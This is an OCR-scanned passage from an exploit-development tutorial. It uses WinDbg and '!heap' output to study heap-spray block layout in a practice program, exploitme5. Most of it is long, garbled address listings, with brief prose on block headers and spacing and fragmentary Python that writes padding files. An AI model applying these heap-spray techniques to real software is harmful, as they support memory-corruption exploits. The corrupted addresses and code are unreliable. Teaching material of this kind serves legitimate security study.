Virtual block: 
Virtual block: 
Virtual block: 


02070000 - 02070000 (size 00000000) 
02270000 - 02270000 (size 00000000) 
02380000 - 02380000 (size 00000000) 
02490000 - 02490000 (size 00000000) 
025а0000 - 025а0000 (size 00000000) 
02650000 - 02650000 (size 00000000) 
027с0000 - 0270000 (size 00000000) 
02840000 - 02840000 (size 00000000 
029е0000 - 029е0000 (size 00000000 
02а0000 - 02af0000 (size 00000000) 
02с00000 - 02с00000 (size 00000000) 
02410000 - 02410000 (size 00000000) 
02е20000 - 02е20000 (size 00000000) 
02130000 - 0230000 (size 00000000) 
03040000 - 03040000 (size 00000000) 
03150000 - 03150000 (size 00000000) 
03260000 - 03260000 (size 00000000) 
03370000 - 03370000 (size 00000000) 
03480000 - 03480000 (size 00000000) 

( 

( 

( 


) 
) 


03590000 - 03590000 (size 00000000) 
036a0000 - 036a0000 (size 00000000) 
03700000 - 03750000 (size 00000000) 
038с0000 - 038с0000 (size 00000000) 
03940000 - 03940000 (size 00000000 
03ae0000 - 03ae0000 (size 00000000 
03010000 - 03010000 (віге 00000000) 
03400000 - 03400000 (size 00000000) 


) 
) 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


03е10000 - 03e10000 (size 00000000) 
03120000 - 03120000 (size 00000000) 
04030000 - 04030000 (size 00000000) 
04140000 - 04140000 (size 00000000) 
04250000 - 04250000 (size 00000000) 
04360000 - 04360000 (size 00000000) 
04470000 - 04470000 (size 00000000) 
04580000 - 04580000 (size 00000000) 
04690000 - 04690000 (size 00000000) 
047а0000 - 047а0000 (size 00000000) 
04800000 - 04860000 (size 00000000) 
049с0000 - 049с0000 (віге 00000000) 
04а90000 - 04аа0000 (size 00000000 
04ре0000 - 04ре0000 (size 00000000 
04с10000 - 04с(0000 (size 00000000) 
04е00000 - 04е00000 (size 00000000) 
04110000 - 0410000 (size 00000000) 
05020000 - 05020000 (size 00000000) 
05130000 - 05130000 (size 00000000) 
05240000 - 05240000 (size 00000000) 
05350000 - 05350000 (size 00000000) 
05460000 - 05460000 (size 00000000) 
05570000 - 05570000 (size 00000000) 

( 

( 

( 

( 


) 
) 


05680000 - 05680000 (size 00000000) 
05790000 - 05790000 (size 00000000) 
058а0000 - 058а0000 (size 00000000) 
05960000 - 05960000 (size 00000000) 
05ас0000 - 05ас0000 (size 00000000) 
05040000 - 05690000 (size 00000000) 
05се0000 - 05се0000 (size 00000000) 
05010000 - 05910000 (size 00000000) 

05100000 - 05100000 (віге 00000000) 


- 192 - 





hitp://expdev-kiuhnm.rhcloud.com 








EXPLOIT DEVELOPMENT COMMUNITY 


Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


06010000 - 06010000 (size 00000000) 
06120000 - 06120000 (size 00000000) 
06230000 - 06230000 (size 00000000) 
06340000 - 06340000 (size 00000000) 
06450000 - 06450000 (size 00000000) 
06560000 - 06560000 (size 00000000) 
06670000 - 06670000 (size 00000000) 
06780000 - 06780000 (size 00000000) 
06890000 - 06890000 (size 00000000) 
06920000 - 06920000 (size 00000000) 
обароооо - Обабоооо (size 00000000) 
066с0000 - 066с0000 (size 00000000) 
06с40000 - 06с40000 (size 00000000) 
064е0000 - 064е0000 (size 00000000) 
06е10000 - 06ef0000 (size 00000000) 
07000000 - 07000000 (size 00000000 
07110000 - 07110000 (size 00000000 
07220000 - 07220000 (size 00000000 
07330000 - 07330000 (size 00000000 
07440000 - 07440000 (size 00000000 
07550000 - 07550000 (size 00000000 
07660000 - 07660000 (size 00000000 
07770000 - 07770000 (size 00000000 
07880000 - 07880000 (size 00000000 
07990000 - 07990000 (size 00000000 
07аа0000 - 07аа0000 (size 00000000 
07000000 - 07650000 (size 00000000 
07сс0000 - 07cc0000 (size 00000000) 
07440000 - 07440000 (size 00000000) 
07ее0000 - 07ее0000 (size 00000000) 
07110000 - 07110000 (size 00000000) 

08100000 - 08100000 (size 00000000) 


) 
) 
) 
) 
) 
) 
) 
) 
) 
) 
) 
) 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


08210000 - 08210000 (size 00000000) 
08320000 - 08320000 (size 00000000) 
08430000 - 08430000 (size 00000000) 
08540000 - 08540000 (size 00000000) 
08650000 - 08650000 (size 00000000) 
08760000 - 08760000 (size 00000000) 
08870000 - 08870000 (size 00000000) 
08980000 - 08980000 (size 00000000) 
08а90000 - 08а90000 (size 00000000) 
086а0000 - 086а0000 (size 00000000) 
08с00000 - 0860000 (size 00000000) 
084с0000 - 084с0000 (size 00000000) 
08е90000 - 08е90000 (size 00000000) 
081е0000 - 081е0000 (size 00000000) 

09010000 - 09010000 (size 00000000) 

09200000 - 09200000 (size 00000000) 
09310000 - 09310000 (size 00000000) 
09420000 - 09420000 (size 00000000) 
09530000 - 09530000 (size 00000000) 
09640000 - 09640000 (size 00000000) 
09750000 - 09750000 (size 00000000) 
09860000 - 09860000 (size 00000000) 
09970000 - 09970000 (size 00000000) 
09а80000 - 09а80000 (size 00000000) 
09590000 - 09690000 (size 00000000) 
09са0000 - 09са0000 (size 00000000) 
09400000 - 09400000 (size 00000000) 
09ес0000 - 09ес0000 (size 00000000) 
09140000 - 09140000 (size 00000000) 

0а0е0000 - 0а0е0000 (size 00000000) 
0a1f0000 - 0a1f0000 (size 00000000) 

0a300000 - 0a300000 (size 00000000) 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


04410000 - 0а410000 (size 00000000) 
0а520000 - 0а520000 (size 00000000) 
0а630000 - Оа630000 (size 00000000) 
028740000 - 02740000 (size 00000000) 
08850000 - 02850000 (size 00000000) 
0а960000 - 0a960000 (size 00000000) 
Oaa70000 - Оаа70000 (size 00000000) 
0ар80000 - Оар80000 (size 00000000 
0ас90000 - 0ас90000 (size 00000000 
Оааа0000 - Оааа0000 (size 00000000 
Оаер0000 - Оаер0000 (size 00000000 
Оаїс0000 - Оаїс0000 (size 00000000) 
00040000 - 05040000 (size 00000000) 
061е0000 - 061е0000 (size 00000000) 
06210000 - 0620000 (size 00000000) 
06400000 - 06400000 (size 00000000) 
06510000 - 06510000 (size 00000000) 
06620000 - 06620000 (size 00000000) 
06730000 - 05730000 (size 00000000) 
06840000 - 06840000 (size 00000000) 

( 

( 

( 


) 
) 


) 
) 


06950000 - 05950000 (size 00000000) 
Oba60000 - ОБаб0000 (size 00000000) 
06570000 - 06670000 (size 00000000) 
06с80000 - 0рс80000 (size 00000000) 
Obd90000 - 06990000 (size 00000000 
Ореа0000 - Обеа0000 (size 00000000 
0610000 - 06120000 (size 00000000) 
0с0с0000 - 0с0с0000 (size 00000000) 
0с140000 - 0с140000 (віге 00000000) 
0с2е0000 - 0с2е0000 (size 00000000) 
Oc3f0000 - Oc3f0000 (size 00000000) 

0с500000 - 0c500000 (size 00000000) 


) 
) 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


0с610000 - 0с610000 (size 00000000 
0с720000 - 0с720000 (size 00000000 


( ) 
( ) 
0с830000 - 0с830000 (size 00000000) 
0c940000 - 0c940000 (size 00000000) 
0са50000 - Оса50000 (size 00000000) 
0с660000 - 0660000 (size 00000000) 
0сс70000 - 0сс70000 (size 00000000) 
0с480000 - 0с480000 (size 00000000 
0се90000 - 0се90000 (size 00000000 
Осїа0000 - Осїа0000 (size 00000000) 
04000000 - 04050000 (size 00000000) 
041с0000 - 041с0000 (size 00000000) 
04240000 - 04240000 (size 00000000 
043е0000 - 043е0000 (size 00000000 
0d4f0000 - 04410000 (size 00000000) 
04600000 - 04600000 (size 00000000) 
04710000 - 04710000 (size 00000000) 
04820000 - 04820000 (size 00000000) 


( 
( 
04930000 - 04930000 (size 00000000) 
( 
( 


) 
) 


) 
) 


0da40000 - 0da40000 (size 00000000) 
04050000 - 09650000 (size 00000000) 
0ас60000 - 09с60000 (size 00000000) 
04470000 - 04470000 (вїге 00000000) 
04е80000 - 09е80000 (size 00000000) 
04190000 - 09190000 (size 00000000) 

0е0а0000 - Оеда0000 (size 00000000) 
0е160000 - 0е160000 (size 00000000) 
0е2с0000 - 0e2c0000 (size 00000000) 
0е340000 - 0еЗаоооо (size 00000000 
0е4е0000 - 0е4е0000 (size 00000000 
Oe5f0000 - 0е50000 (size 00000000) 
0e700000 - 0e700000 (size 00000000) 


) 
) 
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Virtual block: 06810000 - 06810000 (size 00000000) 
Virtual block: 06920000 - 06920000 (size 00000000) 
Virtual Боск: Оеа30000 - Оеа30000 (size 00000000) 
Virtual Боск: Оер40000 - Оер40000 (size 00000000) 
Virtual Боск: 0ес50000 - 0ес50000 (size 00000000) 
Virtual Боск: 0еа60000 - 0е960000 (size 00000000) 
Virtual Боск: 0ее70000 - 0ее70000 (size 00000000) 


Virtual block: 0е{80000 - О0еї80000 (size 00000000) 
Virtual block: 0090000 - 01090000 (size 00000000) 
Virtual block: ОНа0000 - 011а0000 (size 00000000) 


Virtual block: 05200000 - 01260000 (size 00000000) 

Virtual block: 0#3с0000 - 0130000 (size 00000000) 

Virtual Боск: 01490000 - 01490000 (size 00000000) 

Virtual block: 015е0000 - 015е0000 (size 00000000) 

00140000 40000062 1024 188 1024 93 9 1201 0 
00650000 40001062 64 12 64 2 2 10 0 
01c80000 40001062 1088 160 1088 68 5 2 0 0 


01е10000 40001062 256 4 256 2 


( 
( 
( 
( 





By comparing the addresses, you can verify that the virtual blocks listed by !heap are the same blocks we 
allocated in exploitme5 and listed by listBlocks(). There's a difference though: 


block 200: address = 0х0#5е0020; size = 1048576 <---- listBlocks() 


Virtual Боск: О#5е0000 - 0#5е0000 (size 00000000) _ <---- ћеар 





As we can see, there are 0x20 bytes of metadata (header) so the block starts at 05560000, but ће usable 
portion starts at 05560020. 


!heap doesn't show us the real size, but we know that each block is 1 MB, i.e. 0x100000. Except for the first 
two blocks, the distance between two adjacent blocks is 0x110000, so there are almost 0x10000 bytes = 64 
KB of junk data between adjacent blocks. We'd like to reduce the amount of junk data as much as possible. 
Let’s try to reduce the size of our blocks. Here’s the updated script: 


Python 


(r'd:Nouf.dat', мб") as f: 





а*(0х100000-0х20)) 


ћир: //expdev-kiuhnm.rhcloud.com 
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After creating buf.dat, we restart exploitme5.exe in WinDbg, allocate the blocks and we get the following: 


0:001> !heap -5 
NtGlobalFlag enables following debugging aids for new heaps: 

tail checking 

free checking 

validate parameters 
LFH Key : 0x6c0192f2 
Termination on corruption : ENABLED 

Heap Flags Reserv Commit Virt Free List UCR Virt Lock Fast 
(k) (К) (k) (k)length blocks cont. heap 


Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


02040000 - 02040000 (size 00000000) 
022е0000 - 022е0000 (size 00000000) 
02310000 - 0230000 (size 00000000) 

02500000 - 02500000 (size 00000000) 
02610000 - 02610000 (size 00000000) 
02720000 - 02720000 (size 00000000) 
02830000 - 02830000 (size 00000000) 
02940000 - 02940000 (size 00000000) 
02а50000 - 02а50000 (size 00000000) 
02560000 - 02560000 (size 00000000) 
02с70000 - 02с70000 (size 00000000) 
02480000 - 02480000 (size 00000000 
02е90000 - 02е90000 (size 00000000 
021а0000 - 02fa0000 (size 00000000) 
03060000 - 03060000 (size 00000000) 
031с0000 - 031с0000 (size 00000000) 
03240000 - 03240000 (size 00000000 
03360000 - 033e0000 (size 00000000 
034f0000 - 034f0000 (size 00000000) 
03600000 - 03600000 (size 00000000) 


) 
) 


) 
) 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


03710000 - 03710000 (size 00000000) 
03820000 - 03820000 (size 00000000) 
03930000 - 03930000 (size 00000000) 
03а40000 - 03а40000 (size 00000000) 
03050000 - 03650000 (size 00000000) 
03с60000 - 03с60000 (size 00000000) 
03470000 - 03470000 (size 00000000 
03е80000 - 03e80000 (size 00000000 
03f90000 - 03190000 (size 00000000) 
040a0000 - 040a0000 (size 00000000) 
04150000 - 04160000 (size 00000000) 
0420000 - 042c0000 (size 00000000) 
04340000 - 04340000 (size 00000000 
044е0000 - 044е0000 (size 00000000 
04510000 - 04510000 (size 00000000) 
04700000 - 04700000 (size 00000000) 
04810000 - 04810000 (size 00000000) 


( 
04920000 - 04920000 (size 00000000) 
( 
( 


) 
) 


) 
) 


04а30000 - 04а30000 (size 00000000) 
04040000 - 04040000 (size 00000000) 
04с50000 - 04с50000 (віге 00000000) 
04460000 - 04460000 (size 00000000 
04е70000 - 04е70000 (size 00000000 
04180000 - 04180000 (віге 00000000) 
05090000 - 05090000 (size 00000000) 
051а0000 - 051а0000 (size 00000000) 
05260000 - 05250000 (size 00000000) 
053с0000 - 053с0000 (size 00000000) 
05440000 - 05440000 (size 00000000 
055е0000 - 05560000 (size 00000000 
05610000 - 05610000 (віге 00000000) 


05800000 - 05800000 (size 00000000) 


) 
) 


) 
) 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


05910000 - 05910000 (size 00000000) 
05а20000 - 05а20000 (size 00000000) 
05530000 - 05630000 (size 00000000) 
05640000 - 05640000 (size 00000000) 
05450000 - 05450000 (size 00000000 
05660000 - 05660000 (size 00000000 
05170000 - 05170000 (віге 00000000) 
06080000 - 06080000 (size 00000000) 
06190000 - 06190000 (size 00000000) 
062а0000 - 062а0000 (size 00000000) 
06300000 - 06360000 (size 00000000) 
064c0000 - 0640000 (size 00000000) 
06540000 - 06540000 (size 00000000 
066е0000 - 066е0000 (size 00000000 
06710000 - 06710000 (size 00000000) 
06900000 - 06900000 (size 00000000) 
0ба10000 - 06а10000 (size 00000000) 
0620000 - 06620000 (size 00000000) 
06с30000 - 06с30000 (size 00000000) 
06440000 - 06440000 (size 00000000 
06е50000 - 06е50000 (size 00000000 
06160000 - 06160000 (size 00000000) 
07070000 - 07070000 (віге 00000000) 
07180000 - 07180000 (size 00000000) 


( 
07290000 - 07290000 (size 00000000) 
( 
( 


) 
) 


) 
) 


) 
) 


07За0000 - 07За0000 (size 00000000) 
07400000 - 07400000 (size 00000000) 
075с0000 - 07560000 (size 00000000) 
07640000 - 07640000 (size 00000000 
077e0000 - 077e0000 (size 00000000 
078f0000 - 078f0000 (size 00000000) 
07a00000 - 07a00000 (size 00000000) 


) 
) 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


07b10000 - 07610000 (size 00000000) 
07с20000 - 07с20000 (size 00000000) 
07430000 - 07430000 (віге 00000000 
07е40000 - 07е40000 (size 00000000 
07150000 - 07150000 (size 00000000) 
08060000 - 08060000 (size 00000000) 
08170000 - 08170000 (size 00000000) 
08280000 - 08280000 (size 00000000) 
08390000 - 08390000 (size 00000000) 

( 

( 


) 
) 


084а0000 - 084а0000 (size 00000000) 
08500000 - 08500000 (size 00000000) 
086с0000 - 086с0000 (size 00000000) 
08740000 - 08740000 (size 00000000 
088е0000 - 088e0000 (size 00000000 
08910000 - 0890000 (size 00000000) 
08500000 - 08600000 (size 00000000) 
08с10000 - 08с10000 (size 00000000) 
08420000 - 08420000 (size 00000000 
08е30000 - 08е30000 (size 00000000 
08140000 - 08140000 (віге 00000000) 
09050000 - 09050000 (size 00000000) 
09160000 - 09160000 (size 00000000) 
09270000 - 09270000 (size 00000000) 


( 
( 
09380000 - 09380000 (size 00000000) 
( 
( 
( 


) 
) 


) 
) 


09490000 - 09490000 (size 00000000) 
095а0000 - 095а0000 (size 00000000) 
09600000 - 09600000 (size 00000000) 
097c0000 - 097c0000 (size 00000000) 
098d0000 - 098d0000 (size 00000000 
099е0000 - 099е0000 (size 00000000 
09а(0000 - 09а!0000 (size 00000000) 
09с00000 - 09с00000 (size 00000000) 


) 
) 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


09410000 - 09410000 (size 00000000) 
09е20000 - 09е20000 (size 00000000) 
09f30000 - 09130000 (size 00000000) 

02040000 - 02040000 (size 00000000) 
0а150000 - 0а150000 (size 00000000) 
0а260000 - 0а260000 (size 00000000) 
0а370000 - 0а370000 (size 00000000) 
08480000 - 02480000 (size 00000000) 
02590000 - 02590000 (size 00000000) 
Оаба0000 - Оаба0000 (size 00000000) 
0а760000 - 0а760000 (size 00000000) 
0а8с0000 - Оа8с0000 (size 00000000) 
0а940000 - Оа940000 (size 00000000 
Оаае0000 - Оаае0000 (size 00000000 
Oabf0000 - Оар 0000 (size 00000000) 
Oad00000 - Оааооооо (size 00000000) 
Оае10000 - Оае10000 (size 00000000) 
Оағ20000 - бат20000 (size 00000000) 

06030000 - 06030000 (size 00000000) 
06140000 - 06140000 (size 00000000) 
06250000 - 06250000 (size 00000000) 
06360000 - 06360000 (size 00000000) 


( 
( 
( 
06470000 - 06470000 (size 00000000) 
( 
( 
( 
( 


) 
) 


06580000 - 06580000 (size 00000000) 
06690000 - 06690000 (size 00000000) 
0р7а0000 - 067а0000 (size 00000000) 
06860000 - 05850000 (size 00000000) 
069с0000 - 069с0000 (size 00000000) 
Obad0000 - Obad0000 (size 00000000 
Орре0000 - 0рре0000 (size 00000000 
Obcf0000 - 0рс(0000 (size 00000000) 
06е00000 - 0ре00000 (size 00000000) 


) 
) 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


Obf10000 - Obf10000 (size 00000000) 

0с020000 - 0с020000 (size 00000000) 
0c130000 - 0c130000 (size 00000000) 
0c240000 - 0c240000 (size 00000000) 
0c350000 - 0c350000 (size 00000000) 
0c460000 - 0c460000 (size 00000000) 
0c570000 - 0c570000 (size 00000000) 
0c680000 - 0c680000 (size 00000000) 
0c790000 - 0c790000 (size 00000000) 
0с8а0000 - 0с8а0000 (size 00000000) 
0с9р0000 - 0с960000 (size 00000000) 
Осасоооо - Осасоооо (size 00000000) 
0ср40000 - Осраоооо (size 00000000) 
Оссеоооо - Оссе0000 (size 00000000) 
Ocdf0000 - Ocdf0000 (size 00000000) 

Ocf00000 - Ocf00000 (size 00000000) 

04010000 - 04010000 (size 00000000) 
0d120000 - 0d120000 (size 00000000) 
0d230000 - 0d230000 (size 00000000) 
0d340000 - 0d340000 (size 00000000) 
0d450000 - 0d450000 (size 00000000) 
09560000 - 09560000 (size 00000000) 
09670000 - 09670000 (size 00000000) 
04780000 - 04780000 (size 00000000) 
04890000 - 04890000 (size 00000000) 
0d9a0000 - 099а0000 (size 00000000) 
( 


Odab0000 - Odab0000 (size 00000000) 


0496с0000 - 0960000 (size 00000000) 
09с90000 - 09с90000 (5їге 00000000) 
044е0000 - 044е0000 (size 00000000) 
Odef0000 - 04е0000 (size 00000000) 


0е000000 - 0е000000 (size 00000000) 
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Virtual block: 0e110000 - 0e110000 (size 00000000) 
Virtual block: 06220000 - 0e220000 (size 00000000) 
Virtual block: 06330000 - 06330000 (size 00000000) 
Virtual block: 06440000 - 06440000 (size 00000000) 
Virtual block: 0е550000 - 0е550000 (size 00000000) 
Virtual Боск: 0е660000 - 0е660000 (size 00000000) 
Virtual Боск: 0е770000 - 0е770000 (size 00000000) 
Virtual Боск: 0е880000 - 0е880000 (size 00000000) 
Virtual block: 06990000 - 06990000 (size 00000000) 
Virtual block: Оеаа0000 - Оеаа0000 (size 00000000) 

( ) 


Virtual block: Оерр0000 - O0ebb0000 (size 00000000 
Virtual block: 0есс0000 - Оесс0000 (size 00000000) 
Virtual Боск: 0е990000 - 0edd0000 (size 00000000) 


Virtual Боск: деее0000 - Оеее0000 (size 00000000) 

Virtual block: Oeff0000 - Oeff0000 (size 00000000) 

Virtual Боск: 01100000 - 01100000 (size 00000000) 

Virtual block: 01210000 - 01210000 (size 00000000) 

Virtual block: 07320000 - 01320000 (size 00000000) 

Virtual block: 01430000 - 07430000 (size 00000000) 

Virtual block: 07540000 - 07540000 (size 00000000) 

Virtual block: 01650000 - 01650000 (size 00000000) 

00700000 40000062 1024 188 1024 93 9 1201 0 
00190000 40001062 64 12 64 2210 0 
020c0000 40001062 1088 160 1088 68 5 2 0 0 
022а0000 40001062 256 4 256 2 





Nothing changed! Let's try to reduce the size of our blocks even more: 
Python 


(r'd:\buf.dat’, 'wb') as f: 





а*(0х100000-0х30)) 


In WinDbg: 
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0:001» !һеар -s 
NtGlobalFlag enables following debugging aids for new heaps: 

tail checking 

free checking 

validate parameters 
LFH Key : 0x4863b9c2 
Termination on corruption : ENABLED 

Heap Flags Reserv Commit Virt Free List UCR Virt Lock Fast 
(k) (k) (k) (k)length blocks cont. heap 


Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


00с60000 - 00c60000 (size 00000000) 
00e60000 - 00e60000 (size 00000000) 
00f60000 - 00160000 (size 00000000) 
01060000 - 01060000 (size 00000000) 
01160000 - 01160000 (size 00000000) 
02730000 - 02730000 (size 00000000) 
02830000 - 02830000 (size 00000000) 
02930000 - 02930000 (size 00000000) 
02а30000 - 02а30000 (size 00000000) 
02630000 - 02630000 (size 00000000) 
02с30000 - 02с30000 (size 00000000) 
02430000 - 02430000 (size 00000000 
02е30000 - 02е30000 (size 00000000 
02130000 - 02130000 (size 00000000) 
03030000 - 03030000 (size 00000000 
03130000 - 03130000 (size 00000000 
03230000 - 03230000 (size 00000000 
03330000 - 03330000 (size 00000000 
03430000 - 03430000 (size 00000000 

( 

( 

( 


) 
) 


03530000 - 03530000 (size 00000000 
03630000 - 03630000 (size 00000000 
03730000 - 03730000 (size 00000000 


) 
) 
) 
) 
) 
) 
) 
) 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


03830000 - 03830000 (size 00000000) 
03930000 - 03930000 (size 00000000) 
03а30000 - 03а30000 (size 00000000) 
03530000 - 03630000 (size 00000000) 
03с30000 - 03с30000 (size 00000000) 
03430000 - 03430000 (size 00000000 
03е30000 - 03e30000 (size 00000000 
03130000 - 03130000 (size 00000000) 
04030000 - 04030000 (size 00000000) 
04130000 - 04130000 (size 00000000) 
04230000 - 04230000 (size 00000000) 
04330000 - 04330000 (size 00000000) 
04430000 - 04430000 (size 00000000) 
04530000 - 04530000 (size 00000000) 
04630000 - 04630000 (size 00000000) 

( 

( 

( 

( 

( 


) 
) 


04730000 - 04730000 (size 00000000) 
04830000 - 04830000 (size 00000000) 
04930000 - 04930000 (size 00000000) 
04а30000 - 04а30000 (size 00000000) 
04530000 - 04630000 (size 00000000) 
04с30000 - 04с30000 (віге 00000000) 
04430000 - 04430000 (size 00000000 
04е30000 - 04е30000 (size 00000000 
04130000 - 04130000 (size 00000000) 
05030000 - 05030000 (size 00000000 
05130000 - 05130000 (size 00000000 
05230000 - 05230000 (size 00000000 
05330000 - 05330000 (size 00000000 
05430000 - 05430000 (size 00000000 

( 

( 

( 


) 
) 


05530000 - 05530000 (size 00000000 
05630000 - 05630000 (size 00000000 


) 
) 
) 
) 
) 
) 
) 
05730000 - 05730000 (size 00000000) 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


05830000 - 05830000 (size 00000000) 
05930000 - 05930000 (size 00000000) 
05а30000 - 05а30000 (size 00000000) 
05030000 - 05630000 (size 00000000) 
05с30000 - 05с30000 (size 00000000) 
05430000 - 05430000 (size 00000000 
05е30000 - 05е30000 (size 00000000 
05130000 - 05130000 (size 00000000) 
06030000 - 06030000 (size 00000000) 
06130000 - 06130000 (size 00000000) 
06230000 - 06230000 (size 00000000) 
06330000 - 06330000 (size 00000000) 
06430000 - 06430000 (size 00000000) 
06530000 - 06530000 (size 00000000) 
06630000 - 06630000 (size 00000000) 

( 

( 

( 

( 

( 


) 
) 


06730000 - 06730000 (size 00000000) 
06830000 - 06830000 (size 00000000) 
06930000 - 06930000 (size 00000000) 
06a30000 - 06a30000 (size 00000000) 
06530000 - 06930000 (size 00000000) 
06с30000 - 06с30000 (size 00000000) 
06430000 - 06430000 (size 00000000 
06е30000 - 06е30000 (size 00000000 
06130000 - 06130000 (віге 00000000) 
07030000 - 07030000 (size 00000000 
07130000 - 07130000 (size 00000000 
07230000 - 07230000 (size 00000000 
07330000 - 07330000 (size 00000000 
07430000 - 07430000 (size 00000000 

( 

( 

( 


) 
) 


07530000 - 07530000 (size 00000000 
07630000 - 07630000 (size 00000000 


) 
) 
) 
) 
) 
) 
) 
